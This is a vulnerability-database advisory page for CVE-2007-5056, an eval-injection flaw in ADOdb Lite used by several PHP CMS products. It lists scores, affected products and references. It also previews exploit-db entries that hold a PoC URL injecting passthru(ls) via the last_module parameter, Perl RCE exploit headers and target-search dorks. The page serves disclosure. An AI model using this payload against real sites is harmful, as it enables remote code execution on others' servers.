Published: 24/09/2007 Updated: 29/09/2017

CVSS v2 Base Score: 6.8 | Impact Score: 6.4 | Exploitability Score: 8.6

VMScore: 705

Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P

Eval injection vulnerability in adodb-perf-module.inc.php in ADOdb Lite 1.42 and previous versions, as used in products including CMS Made Simple, SAPID CMF, Journalness, PacerCMS, and Open-Realty, allows remote malicious users to execute arbitrary code via PHP sequences in the last_module parameter.

Vulnerable Product	Search on Vulmon	Subscribe to Product
adodb lite adodb lite
pacercms pacercms
sapid sapid cmf
cmsmadesimple cms made simple
journalness journalness
open-realty open-realty

### SAPID CMF Build 87 (last_module) Remote Code Execution Vulnerability ### Script R84 : puzzledlsourceforgenet/sourceforge/sapidcmf/sapidcmfr84zip ### Script Update R87 :surfnetdlsourceforgenet/sourceforge/sapidcmf/sapidcmfupdater84-r87zip ### Dork : Powered by SAPID CMF Build 87 ### Vuln : ### 09: */ eval('class perfmo ...

#!/usr/bin/perl # # Vendor url: wwwopen-realtyorg # # note: exploit requires Register_globals = On in phpini # ~Iron # wwwrandombasecom require LWP::UserAgent; print "# # Open-Realty <= 243 Remote Code Execution exploit # By Iron - randombasecom # Greets to everyone at RootShell Security Group # # Example target url: ...

#!/usr/bin/perl # # Vendor url: journalnesssourceforgenet # # note: exploit requires Register_globals = On in phpini # ~Iron # wwwrandombasecom require LWP::UserAgent; print "# # Journalness <= 41 Remote Code Execution exploit # By Iron - randombasecom # Greets to everyone at RootShell Security Group & dHack # # Ex ...

### PacerCMS 06 (last_module) Remote Code Execution Vulnerability ### Script : ovhdlsourceforgenet/sourceforge/pacercms/pacercms06zip ### Dork : Powered by PacerCMS ### POC : ### /includes/adodb_lite/adodb-perf-moduleincphp?last_module=t{};%20class%20t{};passthru(ls);// ### OR INCLUDE SHELL ### /includes/adodb_lite/adodb- ...

# o [bug] /"*_ _ # # -*'` `*-_-'/ # # o o < * )) , ( # # o `*-_`_(__--*"`\ # # ...

CWE-94 http://www.attrition.org/pipermail/vim/2007-September/001800.html http://www.securityfocus.com/bid/25768 http://secunia.com/advisories/26928 http://secunia.com/advisories/28859 http://secunia.com/advisories/28873 http://secunia.com/advisories/28874 http://secunia.com/advisories/28886 http://osvdb.org/40596 http://osvdb.org/41428 http://osvdb.org/41426 http://osvdb.org/41422 http://osvdb.org/41427 http://www.vupen.com/english/advisories/2007/3261 https://exchange.xforce.ibmcloud.com/vulnerabilities/40396 https://exchange.xforce.ibmcloud.com/vulnerabilities/40395 https://exchange.xforce.ibmcloud.com/vulnerabilities/40393 https://exchange.xforce.ibmcloud.com/vulnerabilities/40389 https://exchange.xforce.ibmcloud.com/vulnerabilities/36733 https://www.exploit-db.com/exploits/5098 https://www.exploit-db.com/exploits/5097 https://www.exploit-db.com/exploits/5091 https://www.exploit-db.com/exploits/5090 https://www.exploit-db.com/exploits/4442 https://nvd.nist.gov https://www.exploit-db.com/exploits/5097/

CVE-2007-5056

Vulnerability Summary

Exploits

References

Vulmon Search

About

Products

Connect